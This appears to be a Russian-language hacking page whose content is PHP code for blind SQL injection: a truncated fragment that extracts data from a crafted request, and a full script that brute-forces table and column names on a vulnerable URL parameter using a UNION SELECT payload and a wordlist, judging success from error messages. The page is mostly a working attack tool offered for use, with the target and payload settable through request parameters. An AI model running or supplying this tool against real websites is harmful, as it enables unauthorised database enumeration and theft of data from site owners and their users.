$header="GET ".$set['u'].urlencode($zapros)." HTTP/1.0\r\n";
$header.="Accept-Language: en-us,en;q=0.5\r\n";
$header.="Accept-Charset: utf-8,*;q=0.7\r\n";
$header.="Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,*/*;q=0.5";
$header.="User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50\r\n";
$header.="Connection: keep-alive\r\n";
$header.="Cookie: PHPSESSID=028df047751bfc9a2ee18204eb2d5595\r\n";
$header.='Cookie2: $Version=1'."\r\n";
$header.="Host: ".$set['h']."\r\n\r\n";

$dt="";
$fp=fsockopen($set['h'], 80);
fwrite($fp, $header);
while(!feof($fp)) $dt.=fread($fp, 1024);
fclose($fp);

//Вырезаем необходимую инфу
$dt=substr($dt,strpos($dt,$set['b'])+strlen($set['b']));
$dt=substr($dt,0,strpos($dt,$set['e']));

//Выводим инфу на экран
echo($dt."\r\n");
flush();
}
?>

    Скрипт для брута имен столбцов и полей

    <?php
$set['f']="bryt_name_table.txt";//Словарик с именами таблиц/полей
$set['t']=false;//Определять существование таблицы по наличию строки(true) или отсутствию(false)
$set['n']="Table 'test.+++name+++' doesn't exist";//Если эта строка отсутствует значит таблица есть в БД
$set['y']="Здравствуй вася :)";//Если эта строка присутствует значит таблица есть в БД
$set['u']="http://test1.ru/news?id=";//URL с узвимым параметров В КОНЦЕ(!)
$set['z']="1 union select 1,2,3,4,5,6 FROM +++name+++";//Значение уязвимого параметра
$set['c']="+++name+++";//Строка каждый раз заменяймая на текущее имя таблицы
$set['h']="test1.ru";//Хост

@set_time_limit(0);//30 секунд по дефолту нам может не хватить...

//Чтобы не париться каждый раз и не лезть в файл
if(!empty($_GET['f']))$set['f']=$_GET['f'];
if(!empty($_GET['t']))$set['t']=$_GET['t'];
if(!empty($_GET['n']))$set['n']=$_GET['n'];
if(!empty($_GET['y']))$set['y']=$_GET['y'];
if(!empty($_GET['u']))$set['u']=$_GET['u'];
if(!empty($_GET['z']))$set['z']=$_GET['z'];
if(!empty($_GET['c']))$set['c']=$_GET['c'];
if(!empty($_GET['h']))$set['h']=$_GET['h'];

$tables_names=file($set['f']);//Открываем файл

//Начинаем брутофорс
for($i=0;$i<count($tables_names);$i++)
{
//Удаляем символы перехода строки
$tables_names[$i]=str_replace("\r","",$tables_names[$i]);
$tables_names[$i]=str_replace("\n","",$tables_names[$i]);

//Изменияем строку на текущее имя таблицы
$zapros=str_replace($set['c'],$tables_names[$i],$set['z']);
$in_str=str_replace($set['c'],$tables_names[$i],$set['y']);
$ou_str=str_replace($set['c'],$tables_names[$i],$set['n']);

//Создаем пакет
$header="GET ".$set['u'].urlencode($zapros)." HTTP/1.0\r\n";
$header.="Accept-Language: en-us,en;q=0.5\r\n";
$header.="Accept-Charset: utf-8,*;q=0.7\r\n";
$header.="Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,*/*;q=0.5";
$header.="User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50\r\n";
$header.="Connection: keep-alive\r\n";
//$header.="Cookie: PHPSESSID=028df047751bfc9a2ee18204eb2d5595\r\n";
//$header.='Cookie2: $Version=1'."\r\n";
$header.="Host: ".$set['h']."\r\n\r\n";

//Оптравка/прием данных
$dt="";
$fp=fsockopen($set['h'], 80);
fwrite($fp, $header);
while(!feof($fp)) $dt.=fread($fp, 1024);
fclose($fp);

//Ну и соответственно вывод на экран.
$found=0;
if($set['t'])
{
	if(substr_count($dt,$in_str)>0){echo("<font color='green'><b>".$tables_names[$i]."</b></font><script>alert('".$tables_names[$i]." - found')</script>");$found=1;}
}
if($set['t']===false)
{
	if(substr_count($dt,$ou_str)===0){echo("<font color='green'><b>".$tables_names[$i]."</b></font><script>alert('".$tables_names[$i]." - found')</script>");$found=1;}
}
if($found===0)echo("<font color='red'>".$tables_names[$i]."</font>");
echo("<hr>\r\n");
flush();
}
?>

    Дата створення/оновлення: 25.05.2018

    Back